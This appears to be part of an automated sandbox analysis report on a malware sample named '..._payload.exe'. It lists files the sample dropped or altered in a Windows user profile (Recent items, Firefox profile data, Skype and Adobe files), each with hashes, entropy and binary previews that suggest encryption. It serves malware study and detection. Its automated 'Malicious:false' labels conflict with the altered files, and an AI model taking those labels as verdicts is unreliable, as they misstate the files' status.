                                                                                                      Preview:VLZDG=...x8N...I.q.....u2NC....>..F..kP..w2.B.).v4.....#v....55.\.50.L.o....|.M...a...}..ucs.....?M....S_....rk..W.....1.....rz..M.q...a...tZ..N...<.;....~1;]y.`.)......Uz....h^....<...>..(.a.. ...oD..BA...89..s.t.A.#.._........?.....o.h..:.U.^.^@.<* ."...+Dt..P<...(&2......G...y.0.<....[....O7...k[.y...58A......!H.)..b.=.......EXQ.{I..&yH.QT?W|..|Ac......dc;.j@.?ORb...t...z..~......."["I.]..5...|...56$|j...`...-l.R...F......'.~...,..].q....sO......4d NT..O..!.....D.....j</L...2m.ZE...t..\a..........m.....>.-0.EB....TF.z.p....|..s.....L.m....B}.K..-Yn.|..s.V..lj..#g.D.J.8..-*.^QF.:^.f..........4..I.....%...b....K....(...p@..B.R\.|...Yc.... .}.~Ly.L........8.......v.eG[k..RV.].D\l|.....3BO...mkAfR.Ps.\.#.+^i....3..>mSDD..97.a.9....._.X.8CNo....a..Fyg.Om.Y....B{......,.S...H...~.S.2t%.)r..f.AE1p'..\..sXbD.lwb..._.Qh..QP....}?..[.}@..F.!.2D..t......!ZG...._.>.t.r..(.-(..a.$3.s.a...'...-.e...!.-kL.L?..h~M=..4.i/5..?..[W.Q..L.S.B.u.\p..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WDBWCPEFJW.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848980063325005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mmEHaX5PRhmS02T37FMGdtaS8s3I0nYX8x0TJB5NwwgeuETw0omDfs36YJhlnv6X:JsQ7ISTB5taKI0YuYqwBuyf/KVnwD
                                                                                                      MD5:80372CA984CB577C3F04AF1E3B814674
                                                                                                      SHA1:E1FC8983E9303F2D0AD31022A777F532D95C3E62
                                                                                                      SHA-256:A07FA91A0BEFF0CBDFB74C1D2AE2483184BCB88C5A349091067CD5C09CC0C57C
                                                                                                      SHA-512:3D333A6B62611646A3977ADE2375A737AA4C6FA8E9AAFB35CB810BD6B143D3BD0BF42483E59BDE5D12553EF4616668AFE2E3858941F2407E18543D28A2849F91
                                                                                                      Malicious:false
                                                                                                      Preview:WDBWC_..<u|....P...]S...:.<....7....(...y..%...:......4.._..<.gn].v......N..-..!\.b .&.}G3...l...l$..Bv.2...1...n}...!Q...Q..e......c,$...y.g....I......v.Lk.*g........V#*....`.n...;=.x9v...uH1F...1...U....it#.D..........h.`{..O8.[.\o..`eHb.A...`.hj..q..w8.T".&Zg..|;..A..M.g......UBN.[mg*...tM.YB.....<......6.R.I.Ar.......?.w.....Q.]}P.e...|n..7.".c.............[..Do..16L?.#SQ.I.5...dP.....u.<..{...7.t...,8...1....?....&.Ig.6.Vp&..HG.......*...Hs.....rf4..+l.RV...LO..,......h.%1.[.?..iq.vs....^.v,&...53M@..ZW.j....= '...r..........W&...[......0..f.G.q...f.yq.C.....8v'..._..1...3J.$..R....N..z..b.kd.08.hS.....0BYx`.^..A.33..V.NFB.l..b=j......}...(.....T...........s..1.'.....Z.....:...sq....Q+W}.........r..m5..(.3.."..SU.Pp...vu_v2.*..&RQ...e.|.'.L_..2.}.F.~..M.|p.h..+rbu[.oxTa.D..k]"..k.<..$.M;.`..R!K.....l..y.&]....N....n......|dO."p........S.....d..!.z.|.u.p..1..;hG".H5.*.,..T..R D-...2rs.....x.n.....h...{Y.'cD..g. .R...5..o.cP...$.t.^...St.@.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WGJEOYCVPR.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.846029046057823
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nN9twH8IGjQtvN+G6/efm7GUWjW/OHFLhul9v7xsFt1DwuWRdywGv6bD:rtwcX01NCe1al9v7uFLDKLy/wD
                                                                                                      MD5:D6F53EF2C1CFFA62540741A1FEA1E1B3
                                                                                                      SHA1:EE884965FCF14D97A85AB9DE0647292140425A9F
                                                                                                      SHA-256:F0D2C20E28D2C9A8134BA32A213D512E6971F3C553B5420FE006D67496F07E72
                                                                                                      SHA-512:F1C67874EEE45F22425B8408AC87E907F3A0A06B0DCF34E28D936E5BF7FDE86646C523A7F9E296C42E2B66E133794BBE8EA91EAC4C95CB5188D7E73FDB0BCAE2
                                                                                                      Malicious:false
                                                                                                      Preview:WGJEO...;m...!..mY.#..DH..^..d(8.=4...:.;(.....b|...T....B...yN...'....p/.2.kz.w......<.]y.Kr..[].z......Sh|.O..q.R.......3.A..^B1.@.....px..."...=.y\....2=3Z@.v....S^...+f.......o...3.@..)a`..s.SU.....C..L..:2..{..N.{.*.l.'.......q.U.E.*.G.Ci`.~<...Nss..:...Q.k.6]."..".... 4.a.q..~n(..K8.OI.^.....g.T.b.@U.lcx...#..:./.h..?u..n...jO.....^s.d........2.6...)9;......pJ#..?.eo.....SY....$Y"bM.{.D..b.c.....I.......g..j.v`.q../(.hE.YK..Cac....l.4+.N$...Ri.6,..a..z. .l.w.XQ\.<..J...D..h.k.fY.V.....T...%..1..Q6b=I.*....(n...@.p+.%U.G..(P9y:a@...E0:1"|.%.....&.^%].R.g.....:$.7...k....9.....y....I...l~.."R.G.UN$....o`.....]...j6..#.1%.&..ZN...KJ...v<.........dB.....y..i...B..........?V..1^sXD..`n.......?G...gkl.{..+Q-..&..T...1....4."..X[AF+...[qD{...4T..u.D..x.....aJt.HJ....ar.u.k3j..LjZY..#.k..0S.g0.^...J.....!....t..Z/.LA.0....m..q....Zj.Paj..x..'.Y....q*$..^.0....,.!.~.(!...r...&S!...y.8...k..1O..l..(v..:....^yA.C6<..q.......-.Z7.B.&. .Y..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XZXHAVGRAG.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.828106004507467
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ezy8W5c75I5jpsboXc2f3Mv5zkCylnDkhB4oiEZogTnm/rUn1/t3LvaJv6bD:ek5cFOjdXukjJD+pNlm/rK11LvaJwD
                                                                                                      MD5:2038D20995442E090E7249B9FE53D20C
                                                                                                      SHA1:8128E3936643B8246CA9DE6BBF1913A80FF53183
                                                                                                      SHA-256:7FFA2F6442051D27B8849A666FD242762493547CB1385653FC9D8CB0F404924E
                                                                                                      SHA-512:3D07F0DFFD493DED6D5DE263B0D9ABE7BEA7F5BD218C63D270DD214752387BD08F3BE951C8DB934ACC35614E4C17628736490810D2FA62F9C110C0A8F3B53F8C
                                                                                                      Malicious:false
                                                                                                      Preview:XZXHA............Y.g..N0.qmS..._Y.~..y..H...-....@.:1>...Y .....#...........?i..d.c.?m.s6...1.[.....l~9..,.+..G1...S.I.k.....z;8..f.|..|.f|.wp...T/D..9.p...$c@7...k..d7......%P...h..5'y..q..7..q.....s. .G8al.&.A....=.M......".!.y..Vf.G..H..m.ih3-..'....:H.....R.Y.....W.8..Z.N/...B..en...n...J../...9....X..&v....%....4.....W..X..(...(>...4....z...^0....t.aYBG.............-.W.!z\.%]...n..M.J.Hi..qM}..0.D .J..........N.9.s........7.Yl..$AV.5]k+i(K7....%...5...^H..b.]E%.Q...17......5.. mf~.0..#...>.!.g".%*..d.e...S..%.k....!.v..d..#..2......l...Re)..-.....P...8...dC..!.....1.5.{b.7.;).:=_..u&.%. "...<...{..Vy.0q......q..9.4.y..e...Z.......P...%.(%:...;#..k.M..!P3c!.q....$..kT%2.A.Su.;].pv.A`.z..W..s/p.K.b..J..w..Z....K../.>4..........x.}...;..N,VL.q`7...?..:.].:M...N]Q<.....0.1p...WF..?.#2.!FA.1!.E..$. QW..~e.wt+f..B.w(._..6%........}......U...M=z.5.xl. a.M_).;./.Q.........#I;U.;1.B.[......G.....MG..n.z.5.1....5FfW.4.w.{..*..@G,......."........

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XZXHAVGRAG.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.859231147357393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:lqdY+E5bP/r81DLJMaOTCGC1sqlHEQpAUmm60tkCsB/DecEk5ROewsYZf+5ghvRs:ULE5YIlCFZE+mnV/Ek5czaUpwD
                                                                                                      MD5:384E45E4987F3AE2A5BE189258B4A719
                                                                                                      SHA1:A4AF7104FF4EC296DF9BB57A80F8F802F11407F1
                                                                                                      SHA-256:BE54A7E709C73E2DB9D86A9FCABBFB399370C6065B2F12DE436A24B798895D08
                                                                                                      SHA-512:9B10CEF78D54BC868B105CC5CBB04EA6DE0507F60BE66500B5244D23D57FFFF0E2B705240CFB2C5DB070CB11BD779F4BDC9F6D76753C32197404233C086C4E15
                                                                                                      Malicious:false
                                                                                                      Preview:XZXHA...../$.L.F.*.Jy.K.u.!.9....3..".)....O,....'.u.5....[#..tj.8)....].j.V.k.}3>y.K.F....o..SlxVp.......z.}...d.p..../V#.]X......f\f.....(...mH.....U..._KIZyo.t]....L:..7s.....7t....}.R.w"P..R.. ..[.K....e.yY..V.,.O..5..Z.)./.R...gD....$vn.b.|Ik%....My...S...n............A.D*...:.B-.T..*.<..y.o.....R...._..d..y.vhC%..N...uU...w...u)..m..t!.U....%J.t...z..q......Q...dU...f............_F#.'1ne^...'..3....qh...O....~).o.T. |(=.4..e.>.A.Y...Q.S.^.@8.p.....(ggB.x.p..0:.V...X.M)Pf.i...(.....m...a....O.>.gDZ...-N.....^sg_..F<M..........bP..=..0..p6...e..Dm....0Lp.U5.......q....z..o..v.b.P>`.'.E...t..q..5..3.>..5....QM6..M...1.^...K.:..7$y.G.....c0...q..}....7.~.*..2R.d."..]..5...:.......clh. ....5....h.fL..u.9...VD..@.4...==...._..P........L.o.9K..&f(.v.<D.z.e.Ar.....:...H./B..wMIS.Rs=.:..U......s.Kl.rq...^.[0S``K.O.s.J.l.#.....Y.(.I...v.[tu.r\.#...&.n!5./.......^..t......P_'w5..-j*.....5..+.n7v..}..4...a......`n\.:.....o..k.....j.&`../k$D......s..$..f

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XZXHAVGRAG.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.839126884610047
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mZ3jxhz9xW9dRW/BJ8+YI2eSenYsBjA25us+C7bxCrQTkt/tBv6bD:m7hW9dR6J8+12e/G27+C7bMQTMbwD
                                                                                                      MD5:EAF0C58D5A54949644ADF506FE7B0EB8
                                                                                                      SHA1:94192CD08079D952F285D5C8B087B6653E2790DC
                                                                                                      SHA-256:7562D157E6E6FB40576B3B66B2746A5F8F42712F48D49667B70171FE836BA88B
                                                                                                      SHA-512:D4A54D57110DC76425F7B9239BAEBC0DCC8EBF8674D32BD654AF44410994B602397637622D7D8F4177E6BB862D681DD3A91D76566AFD1424576AA9774042C9DE
                                                                                                      Malicious:false
                                                                                                      Preview:XZXHA...:<.n&.C........'...~.U.!T..".;.q..y.....d`r..5........J....l.w..C..%.I*..D.....).....t..ET.......^p.P..u.....|...N..[1..-J..7..:..+....5#.$h.T..}.......[@.~..:Z...YQ..W.:.i....&.....L..*...'%$........~......k.U!.q..0g.S7.....n@?.........E ...[..B~...e...f.Vpc..0.F.g...........X....g...1T;aL...:..._.A..7..Qu..0%.W{+F.........H..L...t.5..a....hQ..jy.".....*..........C..G..&{..1..S..f.-.G..FgCc1...H.%#Nph1_._gad.7.<,p.|...S.4nd....^?.t.....Y1".c/.W......+..^~.{.BP.t.v.s....n.r.H...i.UC*.+<.R..Zd.SKJh.$........+d..K(.H[.S..~v.X.....df......U...{.Yy...^.f7.n(.z>.q....F........0W....p..1. '....#.......V..o0.yx..........('p......0.t..{...~V.d...#..`.F..x.Z|.......f..z.e..%...3.R............o.1OS9.z...PF..)..Yw..L{.g.zD......f........oE#f.4T..k~.......>.mp\.z...y...(...3......./...k.:.5Cp-..C....o.q....3^.4_.*+X^).!p..v.z.!.U@....?V..v.y0..e..{..........F.....1Q'.......hf?..ZN..&.....=...V..1....X.L.n^...j:3....a6c:.m....7...E.T.C.u..,..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZTGJILHXQB.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.861444757656594
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8nYC4q4Y+MjSgmXKzb7Fndx45TW66Wf2UaNvnrNo1nu370URpy9q5GzyunfDv6bD:CUYRSLXKH7ST3JGRCu370URpy9qYzyuQ
                                                                                                      MD5:93F66E9F1CDC92C54741DC994A949587
                                                                                                      SHA1:E00DAEE98B06D1A695E1242E2A3F6208F7D90C9E
                                                                                                      SHA-256:B93E9FC96EC3A5E7BEC23268334042B3276D8D8E123AFFF99C5A8316E708AEA0
                                                                                                      SHA-512:BC74FB813C1B794CD9511A0ACD979CA024837EF3512071EF8D1FE618A2BBBAA140AB8250627EF47FE92E3F20E86131BABEDF8CB4FDFB16E60B84D59CA3648F50
                                                                                                      Malicious:false
                                                                                                      Preview:ZTGJIU9.b.2.3....9Q....v._tI#JP..]9|.C.~.s..cy...U....=..d..$....0d......Kv....y(H.8&D..l.0.....x+..4.t..I..G.?.x.=......7.....8.f..k......E.....9=..r......&..Q...g..Y.v.|&${.L.|k.K...x4V...."=...Xo..ar.(..b.....Ok^q..<m4......b..........w-.O.....$j.iF.4Oo2.LX.t.......<^C..4%h.x.ON(k.r!Efk.'..o.h..*..a..u^^+....A.hc....o..;..x...{^.W.s.S...O-L"%...&C..iMR.j.X....2r.I.Y....,.....+.-....-..D/j.#....;.G...".......m......r.34.x.'S......d....B`.[...r"H.1z....R....y.G.....2.u.i..Jv.....sV......7t.f^..y.1~6...)I.i..Z\...(...S......!.F.4f...N...sy.h...r.&...E..........W.......r.a,Pn..Z..<X.e...62.......I.{v$.;..6....I^..5.n...=."..~Fj3Z.F.`m..n. G.p..."...P>...,<J..._.,..5..I..]..VTY......*..O..q-i.Ij.k..s..U.i2.....VC.`.J....o.K+..R......$`$....Q]X:sw.V........7-.\.0..!.80.5M....WM.RB.....{B.M}..M."..+.&.G.G.....G..<?.4.....|.....q...Gx.Iy.t.:.P..'Z>n..|e%J......]...V.".#......Y)?.`.<.7:....e~f.G..{mQz....R.....v.7.`.v.a5^U.D-.."....~g.r.q..

                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):495
                                                                                                      Entropy (8bit):7.478722722497947
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:YWlu5N+jwBAqjsiN6fRmSxMcg4hGJwD7R/luzv6cii9a:YvCjKAqjsiUfRmynsJMhlGv6bD
                                                                                                      MD5:E877EAE49B04E9B6019192294A64CC67
                                                                                                      SHA1:2967E56752C2E37D4A916336061FFB4587C79346
                                                                                                      SHA-256:1267CAB0F237DB07FFD459A0DD8BA9E92AB743135C0E17D5F8C64CE59979EC47
                                                                                                      SHA-512:DF0ECC2D78DC33D5BF1918407A07BE35FD6916540D1C6CC9A2B2D9E04CD75456B2F37B404687EA470A4E42046CCC76DEB0567C60432E2751FDB098CA006517F8
                                                                                                      Malicious:false
                                                                                                      Preview:{"ses...H.'K.Y..n..<C|R...V..+...>n=Ur......zH..2$.9.}..W....Q..$...IH.......F....<<4bYP.@...C#.....H..pDJ.."...F.b3.....?..uMP...,Z.c.E.i.M..M-........zr.%...S<.Yi..3Mm..~...z..xp......D.....f..n....d....;C.........xa..!...L>..C<....O.&2s=...d.....LRR........U..&.s...sw...q.*_~wR......*....@q.."...*.*.r:xs.-NJ..E...U.E..&/....4k".[B.9.;*...~.3F..W..xA.B+!n<~#..4+L.!;..Gx.D........J....9.F..]y.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):385
                                                                                                      Entropy (8bit):7.346057259542554
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:YG83hOgnuKJNF4qcuAqWomDGCFxpv6cii9a:Yvx2KJNWudkDRFzv6bD
                                                                                                      MD5:11505C25B4DBAB78BCF04C1C81C040DA
                                                                                                      SHA1:7DF2C467CB3007880A0A14846E0CE01A7C57A4DF
                                                                                                      SHA-256:C1A6CC658AB00A9FE77E29225AEF3838A888334A1937922D153BC5FFE888760F
                                                                                                      SHA-512:43A73E74E446F63F18DD2592263DE093AF402CDD08BBB3C2E8605F6F39426851F7D1CD886FAA0C0329E1BAA3ACFD536340C097D2052BFD1BFBB83BFDA31D7DC3
                                                                                                      Malicious:false
                                                                                                      Preview:{"cli.d..^<...%e..~...u.K....D.......w.....kd...Cw9.*5.T([.ft.n.$.-.^Vi.....rk.|m....p..Lh.&.......w.K?..L.(....mV.cCC.>y..N......>sy.........mp[.B_.j...5..W.XuhJ.o^.h9.)....D....,.j....P.\.nO...,.n...D96..:b..z....14.%4..e..K)...I..XUL6..ys.0cg...R...:.x3-|.L.X..!.......2......6...f.S...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1550
                                                                                                      Entropy (8bit):7.87049878199148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:qQekZp6Zfz+NyVniwsrNi/DTgW0j1tRPht27FwD:oYp6ZbvUhr0/4jfvUm
                                                                                                      MD5:17A047C98BB57F71BAAAB19D5B00ED4E
                                                                                                      SHA1:03CBA54A7282631D6E6AABC5E4FAEADCEE198313
                                                                                                      SHA-256:1A99DAAA809E8E8A7E13C9F549E9ABBBD2099812E7E3F1430378942D0493EF99
                                                                                                      SHA-512:E4271952B74CFCC726EC8535F10715EC062F0CE9F559B6316983AC34968BDBF9ACDE65DC1C3101DD27BD12A668917E5E3D00B45D9C381A7B7A243234BFB8B305
                                                                                                      Malicious:false
                                                                                                      Preview:mozLz+.$.K.....(.....o.\6..Y.;}..l.Y..7L42...p... \..p...TV..'.O...W............g..|N.'.r.b.....3.`[t.."`...S+0#.G.N..6`}..#..C.,..."...D\.p.K.R"..3y..}.....-.Y....@..C..o.#{.../....1w....#.z..EE.!H:2..D....~.. 0...j.7..!.>.P{.....H@..4>4.1.V.y..?Io_...o.X.g6Y...-..y{........(D..n.i?*.M........4..~j'.6ZI).G.q-_9....X..O..Sv.Twl.N....."..S..L..5iU....l...'.v.a.../...5*+(?.H..|p....L...F.*9J..k...$.L.E'...Ag8..?.@........A.O..q..c..J....suS9..5.......Sg...7unH]......&R...w.l.....x.^POK.7..8..Y......*ng..>.....>..A...8<.;z..j".0.M.G..4..G.|.|P.p..+9?...K7...}.'.-HT..nZ....B..su.#.T.iW.i.....R.......T....g..G.&(.Ia@.._....f...B8.7....p..F...5.k\.>.:.D..1o.r..>Z9.QE.k.E..Z..`....K...N}B.Z...-h.."......2.[..7..r.S.fW^.O.....`.C..|.kxF.t..6$..P..J.,...7..7y....#.)Ar+..s..*...Wv."n.Y....f.G.n..h+.2|../%...b9(.dP.Z.w...]...e.~Q....2...3....z.#.. ..Dz..n.x.....=...v..;.5M8R....ML....Q.2...."..]vk\U..[..z.........3.S4.8m....o~T.E..P...3...w.K..

                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4749
                                                                                                      Entropy (8bit):7.960724012462605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:wFwg2kiDBR5GjUc67S8ZT60HnlH1ySS3REfVmVhGTrUp2qwc2puCdlLKS:wFwg2D1w6suluC4vG3Up2NJLdJKS
                                                                                                      MD5:CEB836D185FAC5D2A15FCDE11178B55C
                                                                                                      SHA1:67F6BB754E34215F07E095E452CD1076F6BA9CF7
                                                                                                      SHA-256:87CE4C36B283C62F5758F80C344C7BDE5751FC305E0569993C72C326AFCF3ED5
                                                                                                      SHA-512:7374D8C3E8A9B34EBD401D7F1AEC27AD05D8DF01E93CB306ADDBDFA520DCFB8389712DBAD66EC59E179733E53C4044CD65E5FDBF9FD9DA99CB65FCAC6D4B55C3
                                                                                                      Malicious:false
                                                                                                      Preview:mozLz.U......n.S;#.~..H..e]Sw.M..N.H..s.^u.WTQ...B....D.t.k).@..15Ve0...L..s..y...23$g.i.....+......m..KQmu.^i_.......s....^.7,...|Z..Gx...}S.4&..G.M..:.2....#&...rR....;Uz..4:;#..j..g|c......p......id..m...W}tP..E.{hN..&.h.-......O3.R.C...l.@l)!2.2VL.O?N....!..Wska..U..V...)4>+.VT._....}.1P.S....."..d,5..c.g..JaZ.u..>......2)...+.../.^\........?..e..\...9.D....R.......}Y....K.Cf..Cq.@...9...f.4....*]......$....+6.Q....H.i.J..[ed..ip.._.o.........d..|s..2.~.;.N.o.t.P.Z..^.P..".:..R..Lq.S=.f....X{gV..H.#..Q..#..9H?A.v.a<.Tq..]..pX.?vw...e....q..8M.1$....IPv.?&...5.`.)].a./...C..8.01+..*...a.Cmo.p8..^.q...\.P1'.....Q.L.t...U...1_q.Q...X1/~.1..o....l.;T..B}e...2RR8s ..8 ..%......d+5..=..!G."H9M.Ie.E...b..g.#..c........ln<...@C.S"...B..}J8&.......k.e.Ub.o..;..p4....Hsp.!.{.W.....W-obMW....-.@.@=%..#.m...u../.........O"N...;.....=...g#C.8\.*...z....H...o...O.Y.f......[..FM.2..7....l.G.._....?R'.-.&`;:u......2+o.=$&)......".......Yg.JDx./.SQaO..1

                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131406
                                                                                                      Entropy (8bit):7.998521227995894
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:+03aHdT1WYCMLuNinBEkbFoe2gAi/J/PfJOC:wT1WYNLZB7ZH2JsJ3JOC
                                                                                                      MD5:93BDFF3793CCD493C4B7D50F91BAF5D9
                                                                                                      SHA1:E48408ADDAC9B55DB9B81BD29970F279873AAB53
                                                                                                      SHA-256:B27AB4C5D05CE541AB742CF22DEB4A7D3C367955CCAB2444C61B9F5F91A8BA03
                                                                                                      SHA-512:A0DE0628FE4D8F39021B80487F09FEEA91A70452464EE65B3464A273B8F45C9E5566D1A0BC251614061E8DCD4F4BD0D5CFDCCD2D26F42CA174A0EF2DF3CE9618
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit.<..='..l......"../...Y\V_..../.A.C./...'..qQw..[..<.R...Uq.+.21{A89..I-...H.....r.KBC.7..-b...q.6[.]..#_.......F..&..g^C.F.......H..}.h.........9Y...Ir......L......v]....9.o..w..1"...D.@:M...8.u.h.%..S1W...@.@G.....xN.[Q..E.eD..ik.6.w#.C..|.g3..p...<.o..P....t46L...S[g.i.ksd....?...Vz.!..0da.'.}A1.~bW..T..."_.....Q.a..9..[[c.d.M C.....0....%N..i.af,g..T...r.)...F.....h...6........J..G.a1>..E..$.....-.&..\.^.)..*.O.ti.d.&Kf..h.=......EA..a.2....,..8...J.....N...cC.73.<F..T.'.y.&.....9.DFY..R....6.....@8.r5E...$....c}KC.C.@..)S.8..`&S..]nD...So.,b"..m.!....I.'..9....n.....NW..+.Q..60..uFyW..:.B.mURR..9..23{Gb.....x.jq...T.....'...P'p...6]...qz>...7..r....N.....e..<b.........||...f.......I%...m.:.t..:..)S..5>..p....;.TH...6...+RL;..b{.fP!..1V....8.).V.-.1m...6..2..g......-{@..O3(..Z.r.2._.]-(.:1.......3..z.E...41M%.\.[..w..c..z.....DzD3.-;kp.d.....5....v3W.N.'......u...XD.7.l....H..1.2.{....hS.G.D.Y....l cp.m..?...R>..vH......U...r0.

                                                                                                      C:\Users\user\AppData\Roaming\Skype\RootTools\roottools.conf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):410
                                                                                                      Entropy (8bit):7.406134172024873
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:6U/zQBQoSJprcchu98pg+Q5aWJglNqeUd3wluw9vdrfA8Oa9hgqz+pnRNzXXvV9Q:6UiQoSnr823EZwbNdDAfIV2rzv6cii9a
                                                                                                      MD5:C812ADBD4F0302BD4322BDF7C70BA664
                                                                                                      SHA1:068F6EEAAE9FD0379EB886FF90BE77615FA138F0
                                                                                                      SHA-256:706160558A955D26B4BFECB6AD3411908CA329E8EF456D2DD01D187FB9786890
                                                                                                      SHA-512:07BC18FF78491DD03869B9EE4ACD79B865B46233E2BCC8D459AE8E12696966E72C8CBB2FD1B3513AE275C559D63120E0B47BEB8CD893C7A62B1D06BBFCFAB97C
                                                                                                      Malicious:false
                                                                                                      Preview:node_y..f...1.5....8..o.....1.wW..L....j.N.+Y4..P..b9...Q..es.3=Q/X..h.6..s.`...d....,...8.<.?........`..f....!...@.]8Z....0.........9..Y....J.9.!}...x._.)...w.....(.G.Ex.oa.1.-.!.x...R.RZ...v..0...Q........b,.:....B<".....E-.c:..s. .F>`...\.#..d..9...<wk....%t..sg..t.f.#.s...O.Z..f.-2n..S.....L..JLSD....lhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Application Data\Adobe\Acrobat\DC\TMDocs.sav.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):370
                                                                                                      Entropy (8bit):7.314166867333088
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4q2gtoOBjEmQ5udpC7ixLSRvZB/X/+79YbOQ+FrfJzLw0n/bulpBzXXvV9Wcii9a:ggpjEmzTZSLpX2dQ6rfJ1/buzxv6ciik
                                                                                                      MD5:4BBFFD174379376BFF2AEAC3F2934773
                                                                                                      SHA1:B394D0D2B7D5E0CF33FC3D5888B717AB4AD91A97
                                                                                                      SHA-256:EB7E8E4FD29CB439371A6B49987C244205CCE22B7DB52ED2CF45AF32154636E6
                                                                                                      SHA-512:A49E99737B8024994E88749986C425C879C0A6458448A1BDF04B69B5354A3FAB8E25E4A4D6653FFAE3AC7E26A99CD5DA7A10287D905989AE5CA5ABED443F146B
                                                                                                      Malicious:false
